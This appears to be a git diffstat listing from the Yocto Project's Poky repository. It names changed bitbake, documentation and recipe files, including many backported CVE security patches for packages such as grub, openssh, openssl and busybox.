summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
-rw-r--r--README.OE-Core10
-rw-r--r--SECURITY.md24
-rw-r--r--bitbake/SECURITY.md24
-rwxr-xr-xbitbake/bin/bitbake-getvar48
-rwxr-xr-xbitbake/bin/bitbake-worker14
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst4
-rw-r--r--bitbake/lib/bb/__init__.py9
-rw-r--r--bitbake/lib/bb/build.py19
-rw-r--r--bitbake/lib/bb/command.py28
-rw-r--r--bitbake/lib/bb/compat.py10
-rw-r--r--bitbake/lib/bb/cooker.py52
-rw-r--r--bitbake/lib/bb/cookerdata.py14
-rw-r--r--bitbake/lib/bb/data.py1
-rw-r--r--bitbake/lib/bb/data_smart.py20
-rw-r--r--bitbake/lib/bb/event.py16
-rw-r--r--bitbake/lib/bb/fetch2/__init__.py5
-rw-r--r--bitbake/lib/bb/fetch2/git.py54
-rw-r--r--bitbake/lib/bb/fetch2/wget.py24
-rw-r--r--bitbake/lib/bb/monitordisk.py7
-rw-r--r--bitbake/lib/bb/msg.py6
-rw-r--r--bitbake/lib/bb/parse/ast.py2
-rw-r--r--bitbake/lib/bb/parse/parse_py/BBHandler.py2
-rw-r--r--bitbake/lib/bb/parse/parse_py/ConfHandler.py2
-rw-r--r--bitbake/lib/bb/persist_data.py13
-rw-r--r--bitbake/lib/bb/process.py3
-rw-r--r--bitbake/lib/bb/providers.py4
-rw-r--r--bitbake/lib/bb/runqueue.py185
-rw-r--r--bitbake/lib/bb/server/process.py16
-rw-r--r--bitbake/lib/bb/siggen.py3
-rw-r--r--bitbake/lib/bb/tests/codeparser.py30
-rw-r--r--bitbake/lib/bb/tests/event.py17
-rw-r--r--bitbake/lib/bb/tests/fetch.py117
-rw-r--r--bitbake/lib/bb/tinfoil.py17
-rw-r--r--bitbake/lib/bb/ui/knotty.py32
-rw-r--r--bitbake/lib/bb/ui/taskexp.py5
-rw-r--r--bitbake/lib/bb/utils.py52
-rw-r--r--bitbake/lib/bblayers/action.py4
-rw-r--r--bitbake/lib/bblayers/layerindex.py1
-rw-r--r--bitbake/lib/bblayers/query.py8
-rw-r--r--bitbake/lib/hashserv/server.py23
-rw-r--r--bitbake/lib/layerindexlib/__init__.py1
-rw-r--r--bitbake/lib/toaster/toastergui/api.py26
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst15
-rw-r--r--documentation/bsp-guide/bsp.rst5
-rw-r--r--documentation/conf.py24
-rw-r--r--documentation/dev-manual/dev-manual-common-tasks.rst76
-rw-r--r--documentation/dev-manual/dev-manual-start.rst19
-rw-r--r--documentation/kernel-dev/kernel-dev-common.rst2
-rw-r--r--documentation/overview-manual/overview-manual-concepts.rst4
-rw-r--r--documentation/overview-manual/overview-manual-development-environment.rst4
-rw-r--r--documentation/overview-manual/overview-manual-yp-intro.rst6
-rw-r--r--documentation/poky.yaml15
-rw-r--r--documentation/profile-manual/profile-manual-usage.rst11
-rw-r--r--documentation/ref-manual/migration-3.0.rst3
-rw-r--r--documentation/ref-manual/ref-classes.rst10
-rw-r--r--documentation/ref-manual/ref-features.rst2
-rw-r--r--documentation/ref-manual/ref-images.rst17
-rw-r--r--documentation/ref-manual/ref-release-process.rst2
-rw-r--r--documentation/ref-manual/ref-system-requirements.rst41
-rw-r--r--documentation/ref-manual/ref-tasks.rst19
-rw-r--r--documentation/ref-manual/ref-variables.rst76
-rw-r--r--documentation/releases.rst94
-rw-r--r--documentation/sphinx-static/switchers.js7
-rw-r--r--documentation/toaster-manual/toaster-manual-reference.rst4
-rw-r--r--meta-poky/conf/distro/poky-tiny.conf2
-rw-r--r--meta-poky/conf/distro/poky.conf30
-rw-r--r--meta-poky/conf/local.conf.sample2
-rw-r--r--meta-poky/conf/local.conf.sample.extended23
-rw-r--r--meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb1
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb2
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded2
-rw-r--r--meta-selftest/recipes-test/images/oe-selftest-image.bb2
-rw-r--r--meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb2
-rw-r--r--meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb1
-rw-r--r--meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb1
-rw-r--r--meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb2
-rw-r--r--meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb3
-rw-r--r--meta-skeleton/recipes-skeleton/service/service_0.1.bb1
-rw-r--r--meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend8
-rw-r--r--meta/classes/archiver.bbclass19
-rw-r--r--meta/classes/base.bbclass18
-rw-r--r--meta/classes/bin_package.bbclass3
-rw-r--r--meta/classes/buildhistory.bbclass34
-rw-r--r--meta/classes/cmake.bbclass3
-rw-r--r--meta/classes/cml1.bbclass8
-rw-r--r--meta/classes/create-spdx-2.2.bbclass1067
-rw-r--r--meta/classes/create-spdx.bbclass8
-rw-r--r--meta/classes/cve-check.bbclass466
-rw-r--r--meta/classes/devshell.bbclass1
-rw-r--r--meta/classes/devtool-source.bbclass4
-rw-r--r--meta/classes/devupstream.bbclass2
-rw-r--r--meta/classes/externalsrc.bbclass33
-rw-r--r--meta/classes/fs-uuid.bbclass2
-rw-r--r--meta/classes/go.bbclass10
-rw-r--r--meta/classes/goarch.bbclass2
-rw-r--r--meta/classes/image-live.bbclass4
-rw-r--r--meta/classes/image.bbclass17
-rw-r--r--meta/classes/image_types.bbclass2
-rw-r--r--meta/classes/insane.bbclass42
-rw-r--r--meta/classes/kernel-arch.bbclass4
-rw-r--r--meta/classes/kernel-devicetree.bbclass18
-rw-r--r--meta/classes/kernel-fitimage.bbclass187
-rw-r--r--meta/classes/kernel-yocto.bbclass55
-rw-r--r--meta/classes/kernel.bbclass69
-rw-r--r--meta/classes/libc-package.bbclass3
-rw-r--r--meta/classes/license.bbclass16
-rw-r--r--meta/classes/license_image.bbclass26
-rw-r--r--meta/classes/linux-dummy.bbclass26
-rw-r--r--meta/classes/metadata_scm.bbclass10
-rw-r--r--meta/classes/mirrors.bbclass5
-rw-r--r--meta/classes/multilib.bbclass2
-rw-r--r--meta/classes/nativesdk.bbclass2
-rw-r--r--meta/classes/package.bbclass47
-rw-r--r--meta/classes/package_deb.bbclass4
-rw-r--r--meta/classes/package_ipk.bbclass3
-rw-r--r--meta/classes/package_pkgdata.bbclass2
-rw-r--r--meta/classes/package_rpm.bbclass8
-rw-r--r--meta/classes/patch.bbclass7
-rw-r--r--meta/classes/populate_sdk_base.bbclass16
-rw-r--r--meta/classes/populate_sdk_ext.bbclass12
-rw-r--r--meta/classes/pypi.bbclass2
-rw-r--r--meta/classes/python3targetconfig.bbclass12
-rw-r--r--meta/classes/qemuboot.bbclass3
-rw-r--r--meta/classes/report-error.bbclass2
-rw-r--r--meta/classes/reproducible_build.bbclass90
-rw-r--r--meta/classes/rm_work.bbclass15
-rw-r--r--meta/classes/rootfs-postcommands.bbclass22
-rw-r--r--meta/classes/rootfsdebugfiles.bbclass2
-rw-r--r--meta/classes/sanity.bbclass36
-rw-r--r--meta/classes/sstate.bbclass98
-rw-r--r--meta/classes/staging.bbclass10
-rw-r--r--meta/classes/testimage.bbclass40
-rw-r--r--meta/classes/toolchain-scripts.bbclass4
-rw-r--r--meta/classes/uninative.bbclass8
-rw-r--r--meta/classes/useradd-staticids.bbclass2
-rw-r--r--meta/classes/useradd.bbclass4
-rw-r--r--meta/classes/utils.bbclass2
-rw-r--r--meta/conf/abi_version.conf2
-rw-r--r--meta/conf/bitbake.conf17
-rw-r--r--meta/conf/distro/include/cve-extra-exclusions.inc75
-rw-r--r--meta/conf/distro/include/default-distrovars.inc4
-rw-r--r--meta/conf/distro/include/maintainers.inc51
-rw-r--r--meta/conf/distro/include/ptest-packagelists.inc2
-rw-r--r--meta/conf/distro/include/yocto-uninative.inc11
-rw-r--r--meta/conf/layer.conf2
-rw-r--r--meta/conf/licenses.conf15
-rw-r--r--meta/conf/multilib.conf2
-rw-r--r--meta/files/common-licenses/Spencer-9412
-rw-r--r--meta/files/common-licenses/Unlicense24
-rw-r--r--meta/files/spdx-licenses.json5937
-rw-r--r--meta/files/toolchain-shar-extract.sh3
-rw-r--r--meta/files/toolchain-shar-relocate.sh6
-rw-r--r--meta/lib/bblayers/create.py2
-rw-r--r--meta/lib/buildstats.py4
-rw-r--r--meta/lib/oe/copy_buildsystem.py6
-rw-r--r--meta/lib/oe/cve_check.py154
-rw-r--r--meta/lib/oe/gpg_sign.py2
-rw-r--r--meta/lib/oe/license.py6
-rw-r--r--meta/lib/oe/package_manager.py15
-rw-r--r--meta/lib/oe/packagedata.py11
-rw-r--r--meta/lib/oe/patch.py6
-rw-r--r--meta/lib/oe/reproducible.py13
-rw-r--r--meta/lib/oe/rootfs.py8
-rw-r--r--meta/lib/oe/sbom.py84
-rw-r--r--meta/lib/oe/spdx.py357
-rw-r--r--meta/lib/oe/sstatesig.py5
-rw-r--r--meta/lib/oe/terminal.py20
-rw-r--r--meta/lib/oe/utils.py3
-rw-r--r--meta/lib/oeqa/core/case.py9
-rw-r--r--meta/lib/oeqa/core/decorator/oetimeout.py5
-rw-r--r--meta/lib/oeqa/core/target/ssh.py4
-rw-r--r--meta/lib/oeqa/core/tests/cases/timeout.py13
-rwxr-xr-xmeta/lib/oeqa/core/tests/test_decorators.py6
-rw-r--r--meta/lib/oeqa/manual/eclipse-plugin.json6
-rw-r--r--meta/lib/oeqa/manual/toaster-managed-mode.json2
-rw-r--r--meta/lib/oeqa/runtime/cases/date.py13
-rw-r--r--meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py36
-rw-r--r--meta/lib/oeqa/runtime/cases/ksample.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ltp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/pam.py3
-rw-r--r--meta/lib/oeqa/runtime/cases/parselogs.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/ping.py20
-rw-r--r--meta/lib/oeqa/runtime/cases/rpm.py32
-rw-r--r--meta/lib/oeqa/runtime/cases/rtc.py40
-rw-r--r--meta/lib/oeqa/runtime/cases/scp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/suspend.py33
-rw-r--r--meta/lib/oeqa/runtime/cases/terminal.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/usb_hid.py22
-rw-r--r--meta/lib/oeqa/runtime/context.py33
-rw-r--r--meta/lib/oeqa/sdk/cases/buildepoxy.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/archiver.py16
-rw-r--r--meta/lib/oeqa/selftest/cases/bblayers.py5
-rw-r--r--meta/lib/oeqa/selftest/cases/bbtests.py13
-rw-r--r--meta/lib/oeqa/selftest/cases/buildoptions.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/cve_check.py186
-rw-r--r--meta/lib/oeqa/selftest/cases/devtool.py19
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/distrodata.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/glibc.py8
-rw-r--r--meta/lib/oeqa/selftest/cases/gotoolchain.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/imagefeatures.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/utils.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/oescripts.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/prservice.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/recipetool.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/reproducible.py125
-rw-r--r--meta/lib/oeqa/selftest/cases/runcmd.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/runqemu.py9
-rw-r--r--meta/lib/oeqa/selftest/cases/runtime_test.py43
-rw-r--r--meta/lib/oeqa/selftest/cases/sstatetests.py14
-rw-r--r--meta/lib/oeqa/selftest/cases/tinfoil.py28
-rw-r--r--meta/lib/oeqa/selftest/cases/wic.py18
-rw-r--r--meta/lib/oeqa/utils/buildproject.py3
-rw-r--r--meta/lib/oeqa/utils/commands.py3
-rw-r--r--meta/lib/oeqa/utils/metadata.py6
-rw-r--r--meta/lib/oeqa/utils/nfs.py4
-rw-r--r--meta/lib/oeqa/utils/qemurunner.py41
-rw-r--r--meta/lib/oeqa/utils/targetbuild.py4
-rw-r--r--meta/recipes-bsp/efibootmgr/efibootmgr_17.bb2
-rw-r--r--meta/recipes-bsp/efivar/efivar/determinism.patch18
-rw-r--r--meta/recipes-bsp/efivar/efivar_37.bb3
-rw-r--r--meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb1
-rw-r--r--meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch235
-rw-r--r--meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch30
-rw-r--r--meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch65
-rw-r--r--meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch59
-rw-r--r--meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch55
-rw-r--r--meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch128
-rw-r--r--meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch121
-rw-r--r--meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch35
-rw-r--r--meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch82
-rw-r--r--meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch36
-rw-r--r--meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch94
-rw-r--r--meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch78
-rw-r--r--meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch104
-rw-r--r--meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch47
-rw-r--r--meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch77
-rw-r--r--meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch46
-rw-r--r--meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372.patch76
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch130
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch431
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch57
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch52
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch158
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25632.patch90
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25647.patch119
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27749.patch609
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779.patch70
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch105
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch35
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch62
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch61
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch65
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20225.patch58
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20233.patch50
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3695.patch178
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3696.patch46
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3697.patch82
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3981.patch32
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-2601.patch87
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28733.patch60
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28734.patch67
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28735.patch271
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28736.patch275
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-3775.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4692.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4693.patch62
-rw-r--r--meta/recipes-bsp/grub/files/determinism.patch2
-rw-r--r--meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch117
-rw-r--r--meta/recipes-bsp/grub/files/no-insmod-on-sb.patch107
-rw-r--r--meta/recipes-bsp/grub/grub2.inc87
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch36
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb1
-rw-r--r--meta/recipes-bsp/opensbi/opensbi_0.6.bb3
-rw-r--r--meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb5
-rw-r--r--meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb2
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-common.inc4
-rw-r--r--meta/recipes-bsp/v86d/v86d_0.1.10.bb1
-rw-r--r--meta/recipes-connectivity/avahi/avahi.inc10
-rw-r--r--meta/recipes-connectivity/avahi/avahi_0.7.bb3
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch42
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch60
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch48
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch65
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch57
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch53
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch73
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch52
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch45
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch109
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch67
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch31
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch33
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch166
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch175
-rw-r--r--meta/recipes-connectivity/bind/bind_9.11.37.bb (renamed from meta/recipes-connectivity/bind/bind_9.11.22.bb)10
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5.inc8
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch109
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch34
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch95
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch66
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch39
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch126
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch54
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5_5.55.bb10
-rw-r--r--meta/recipes-connectivity/connman/connman-gnome_0.7.bb2
-rw-r--r--meta/recipes-connectivity/connman/connman.inc2
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch62
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch231
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch33
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch72
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch121
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch50
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch37
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch266
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch54
-rw-r--r--meta/recipes-connectivity/connman/connman_1.37.bb9
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch66
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch120
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch40
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb3
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch283
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch254
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch67
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch54
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb4
-rw-r--r--meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb3
-rw-r--r--meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb8
-rw-r--r--meta/recipes-connectivity/neard/neard_0.16.bb13
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch97
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch20
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch52
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch189
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch581
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch171
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch34
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch194
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch73
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch125
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch315
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch38
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch39
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch307
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch120
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch468
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch95
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd.socket1
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd@.service2
-rw-r--r--meta/recipes-connectivity/openssh/openssh_8.2p1.bb58
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch38
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch37
-rw-r--r--meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch122
-rw-r--r--meta/recipes-connectivity/openssl/openssl/reproducibility.patch22
-rw-r--r--meta/recipes-connectivity/openssl/openssl_1.1.1w.bb (renamed from meta/recipes-connectivity/openssl/openssl_1.1.1i.bb)7
-rw-r--r--meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb1
-rw-r--r--meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch50
-rw-r--r--meta/recipes-connectivity/ppp/ppp_2.4.7.bb1
-rw-r--r--meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb2
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch45
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch58
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch123
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch609
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb5
-rw-r--r--meta/recipes-core/base-files/base-files/hosts2
-rw-r--r--meta/recipes-core/base-passwd/base-passwd_3.5.29.bb1
-rw-r--r--meta/recipes-core/busybox/busybox.inc29
-rw-r--r--meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch51
-rw-r--r--meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch38
-rw-r--r--meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch81
-rw-r--r--meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch64
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42374.patch53
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42376.patch138
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2022-48174.patch82
-rw-r--r--meta/recipes-core/busybox/busybox_1.31.1.bb10
-rw-r--r--meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch215
-rw-r--r--meta/recipes-core/coreutils/coreutils_8.31.bb8
-rw-r--r--meta/recipes-core/dbus-wait/dbus-wait_git.bb3
